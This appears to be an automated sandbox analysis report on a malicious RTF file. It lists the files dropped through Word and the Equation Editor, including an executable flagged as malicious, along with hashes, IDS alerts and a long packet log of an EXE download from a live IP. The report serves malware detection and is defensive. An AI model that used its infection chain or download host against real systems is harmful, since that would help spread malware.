Preview:	......7.3.4.2.9.6.1.5..[.).1.<.,.7.!.!.8./...'.&.5.1.1.`.1.=.7.?.8.<.~.!..._.8.\|.#.2...1._.~.?.-.+.3.^.?.;.~.~.?.?.[.:.'.0.>.?.8..._.].&.:.?.-.;.;.@.1...#./.#.+.$.%.?./.(.%...7...?.,.%.?.4.&.^.>.?.>.1.%.9.`.7.8.>.(.!.:.(.?.5.7.3.!.=.'.;.=.+.`.0.....0.?.7.~.!.?..>...=.@.].5.6...5.>.$.%.-.2...?.,.%.'.4.<.;...'.&.@...7.%.)..).!.6.@.$.@.>.%.?.%.>.?.0.3.7.#.&.?.].5.:./.3.:.?.0.1.=.7.~.1.?.5.2._.._.?...^.=.?.=.;.+.].6.?.9.'.?.?.+...2.8.`.;.:.#.?.:.?.7.&.(.'.5...=.5.?.?.~.%.5.?._.?.+.$.:._.:.3.!.4.^.$.].!.'.%...^...?.9.:.~.?.7.=.^.,.!.%.\|.-...@.!._.+.....\|.].[.%...?.#.%.0.<.$.;.-.&.-.].5.?.%.].\|.,.;.`.6.&.$.8.%.,...!..4.<.&...3.5._...[.....%.).,.7.$..4.#.].?.:..7...$.%...2.?.-.?.-.6.!.'.,.0.?.#.].(.......[.%.&.6.?.?.^.$.\|.-.^.1.<.6.~...6.?.#.'.>.0.\|.3...&.<.$.3...+.%.`...#...<.?.6.7.5.?...<.!.[._.../.%.+.-.7.%.>.0.%.@.~.,._.?._.:.4.7.5.).$.%.+.`.1.?.~._.@.-.~.=.?.).`.?.~.'...7.;._.\|..%.(.%.(.@.>...@.:.).?.'...6.%.,.[...).5.(.%.*.3.9.)...7.(.^.?.1.:.%.,.).,.%.+.:.`.^.?.?.$.'.?.?.5.~.:.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B73513B2-3E0D-42E7-B536-2812A501893B}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\2FBexXRCHR.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:11 2023, mtime=Fri Aug 11 15:42:11 2023, atime=Fri Jul 26 03:39:03 2024, length=92763, window=hide
Category:	dropped
Size (bytes):	1014
Entropy (8bit):	4.5599068748513405
Encrypted:	false
SSDEEP:	12:8Rg5vFgXg/XAlCPCHaXKTBv/B/Pr+X+WYYwNXXnCoicvb4hxYl4LnCkDtZ3YilMh:8Rg5/XTAdswnCbeulnCkDv3qck7N
MD5:	05EE14435E36168E47CD5C7634775A8F
SHA1:	B25AFF4B0F7BC0B1E91BC4F21023B87B8C378726
SHA-256:	77D57E0028863D545338F34C777DDF0172A4714E5C625FE325E33E98164987AD
SHA-512:	904BC0C64BEECBEE3C3D6539DEFD6D4F07AA2F46FB77144172DA5894271436E356DFC87A481DB06D2661F27C090CD1A0616E3F12230A04127AB3078A91108251
Malicious:	false
Reputation:	low
Preview:	L..................F.... ..."q..r..."q..r....C.....[j...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X.$..user.8......QK.X.X.$...&=....U...............A.l.b.u.s.....z.1......WH...Desktop.d......QK.X.WH...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2.[j...X.$ .2FBEXX~1.RTF..J.......WF..WF..........................2.F.B.e.x.X.R.C.H.R...r.t.f.......x...............-...8...[............?J......C:\Users\..#...................\\468325\Users.user\Desktop\2FBexXRCHR.rtf.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.2.F.B.e.x.X.R.C.H.R...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......468325..........D_....3N...W...9.W.e8...8.....[D_....3N...W...9.W.e8

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Generic INItialization configuration [folders]
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.676725395303504
Encrypted:	false
SSDEEP:	3:Hj93mxpzCm4s93mxpzCv:HjVmx5Vmx2
MD5:	A23E46D308B82E50DA6081BF01EBC0B9
SHA1:	4D064ABEFB376A3BB5DB4BC4EBA87A0BFCE871AA
SHA-256:	FCBE0BD08B873A7BF5100BAAA186ED4BAA5C4FE8A82286F462166F4E3E51F157
SHA-512:	41621B388A15BD7B54751B4D491AAF29938E9B5D22C44E0BAC8713899B71A32998E2CE85565555D808E70ACCA72B3BE5600F140399747F63D8B336B4DCD6BFED
Malicious:	false
Preview:	[misc]..2FBexXRCHR.LNK=0..[folders]..2FBexXRCHR.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020307
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyYyBS0JilXMWvk1c6nlln:vdsCkWtIJiRk3l
MD5:	C4615A023DC40AFFAEAE6CF07410BB43
SHA1:	AAE1D68C4082CABF6AEA71C7981F32928CE01843
SHA-256:	103F860A912CF17B87A169B2768635758E8A0B82EB986A0C42FEA974F91BCB1E
SHA-512:	CD6975EAE1DA934094AC2516D095D50F2EE311CF549C8AEA2F3D65074B0DFC2908F72703B46A4C012358817289C76B15AC0E39EE359BCF39A45A8C912DCB2AAD
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\AppData\Roaming\winiti.exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	671744
Entropy (8bit):	7.848719392804634
Encrypted:	false
SSDEEP:	12288:6ChcU7r3FL0YtcCCvLLgov4CnDUOt7TDM2DG0oSb3fqEVzXfmhujHeis3c:Jco3FYYtajLX4stTA2DGbSeEUh+ei8c
MD5:	3D33CBDE84D0A1197EC0D459D634473E
SHA1:	ABD0074C5B2EED8FBAB4D30443CEAC4B403AD09D
SHA-256:	33647CF1D7BA05386D44A608A94979925883F8E8C0E5F63B3F2E7FFDC7380461
SHA-512:	36F31309DDDF020FD9FEE7C44D8847924C4F8A9306A7F04DFA15FD2B73645C982F98D4B7A616B2B31D4B3C14510F2858608BEDA519EB8475780B544A4EEDCEA1
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f..............0......@......B.... ........@.. ... ...................@... ........@.....................................O............................ ....................................................... ............... ..H............text...H.... ....... .............. ..`.rsrc............ ..................@..@.reloc....... ... ... ..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$BexXRCHR.rtf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020307
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyYyBS0JilXMWvk1c6nlln:vdsCkWtIJiRk3l
MD5:	C4615A023DC40AFFAEAE6CF07410BB43
SHA1:	AAE1D68C4082CABF6AEA71C7981F32928CE01843
SHA-256:	103F860A912CF17B87A169B2768635758E8A0B82EB986A0C42FEA974F91BCB1E
SHA-512:	CD6975EAE1DA934094AC2516D095D50F2EE311CF549C8AEA2F3D65074B0DFC2908F72703B46A4C012358817289C76B15AC0E39EE359BCF39A45A8C912DCB2AAD
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

Static File Info

General

File type:	Rich Text Format data, version 1
Entropy (8bit):	2.8000023315315508
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	2FBexXRCHR.rtf
File size:	92'763 bytes
MD5:	02e73ef6a6bde5caa7628ee916111f60
SHA1:	85fcd05b810401dffc45b6c2cb831787a8a131d3
SHA256:	a74f7219f672e155f20c501b9285630b07e70922c058fa3713c29012b8cbdb8c
SHA512:	b8c529090265796d41b354455ff799e8a2052f7ed68772abcfabeb39265974ca678ed7795b7c80202fae25f2f2b5ee2917e4680629dd65f44d56960a8e27d69c
SSDEEP:	384:/0kgUrKbZx8JmEAGNygqZ9Z8bB4GviVYgBzv5i/QG6luWjSsmPbkFJ:TgUr2Z+yVZznSGzvg4GYui1mPoJ
TLSH:	3393F198D78F41A6CF54A33B132B0A8805FDB73EB30515A674AC837537AEC2D44A95BC
File Content Preview:	{\rtf1.......{\\fRelChangePage280277307 \(}.{\973429615[)1<,7!!8/.'&511`1=7?8<~!._8\|#2.1_~?-+3^?;~~??[:'0>?8._]&:?-;;@1.#/#+$%?/(%.7.?,%?4&^>?>1%9`78>(!:(?573!=';=+`0..0?7~!?>.=@]56.5>$%-2.?,%'4<;.'&@.7%))!6@$@>%?%>?037#&?]5:/3:?01=7~1?52_*_?.^=?=;+]6

File Icon


Icon Hash:	2764a3aaaeb7bdbf

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	00001D9Dh								no

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-26T06:39:08.862254+0200	TCP	2022050	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1	80	49163	198.46.174.139	192.168.2.22
2024-07-26T06:39:09.043752+0200	TCP	2022051	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2	80	49163	198.46.174.139	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 26, 2024 06:39:08.320808887 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:08.334347010 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:08.334682941 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:08.334826946 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:08.339840889 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:08.861911058 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:08.861965895 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:08.862008095 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:08.862015963 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:08.862147093 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:08.862183094 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:08.862216949 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:08.862220049 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:08.862220049 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:08.862220049 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:08.862253904 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:08.862267971 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:08.862303019 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:08.862747908 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:08.862782001 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:08.862816095 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:08.862818003 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:08.862848997 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:08.862869978 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:08.866883039 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:08.866990089 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:08.867048979 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:08.867609978 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:08.867743969 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:08.952476025 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:08.952553034 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:08.952558994 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:08.952774048 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:08.952809095 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:08.952826977 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:08.952850103 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:08.957299948 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:08.957334042 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:08.957374096 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:08.957479000 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:08.957484007 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:08.957514048 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:08.957586050 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:08.962027073 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:08.962064028 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:08.962091923 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:08.962096930 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:08.962150097 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:08.962215900 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:08.962250948 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:08.962285042 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:08.962306976 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:08.966842890 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:08.966877937 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:08.966897964 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:08.966917038 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:08.966949940 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:08.966986895 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:08.967039108 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:08.971579075 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:08.971613884 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:08.971646070 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:08.971683025 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:08.971718073 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:08.971718073 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:08.971743107 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:08.971777916 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:08.971832037 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:08.971961021 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.043751955 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.043811083 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.043826103 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.043844938 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.043865919 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.043895006 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.044079065 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.044166088 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.048631907 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.048666954 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.048698902 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.048727036 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.049006939 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.049040079 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.049061060 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.049091101 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.053421021 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.053455114 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.053489923 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.053491116 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.053777933 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.053812027 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.053857088 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.053862095 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.053905964 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.053951025 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.058206081 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.058257103 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.058283091 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.058311939 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.059339046 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.059372902 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.059412956 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.059412956 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.063043118 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.063076973 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.063119888 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.063119888 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.064106941 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.064146996 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.064167023 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.064192057 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.067801952 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.067835093 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.067856073 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.067866087 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.067874908 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.067913055 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.068106890 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.068140030 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.068157911 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.068197966 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.068242073 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.068253994 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.068276882 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.068289995 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.068571091 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.068809032 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.068867922 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.068909883 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.068944931 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.068962097 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.068977118 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.069010973 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.069020987 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.069044113 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.069057941 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.069092035 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.069785118 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.069818974 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.069838047 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.069852114 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.069883108 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.069886923 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.069905043 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.069921017 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.069941044 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.069957972 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.069972038 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.070003033 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.134556055 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.134608030 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.134620905 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.134641886 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.134659052 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.134679079 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.134690046 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.134723902 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.134793997 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.134826899 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.134843111 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.134861946 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.134865999 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.134910107 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.135227919 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.135281086 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.135395050 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.135445118 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.135509968 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.135559082 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.135729074 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.135761976 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.135778904 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.135798931 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.136056900 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.136090040 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.136106014 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.136130095 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.136569023 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.136621952 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.136667013 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.136701107 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.136714935 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.136744022 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.136995077 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.137027979 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.137044907 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.137068033 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.137458086 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.137506008 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.137571096 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.137603998 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.137615919 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.137747049 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.137840986 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.137876987 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.137890100 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.137918949 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.138360977 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.138410091 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.138477087 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.138509989 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.138520002 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.138549089 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.138787985 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.138819933 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.138834953 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.138861895 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.139296055 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.139348030 CEST	49163	80	192.168.2.22	198.46.174.139
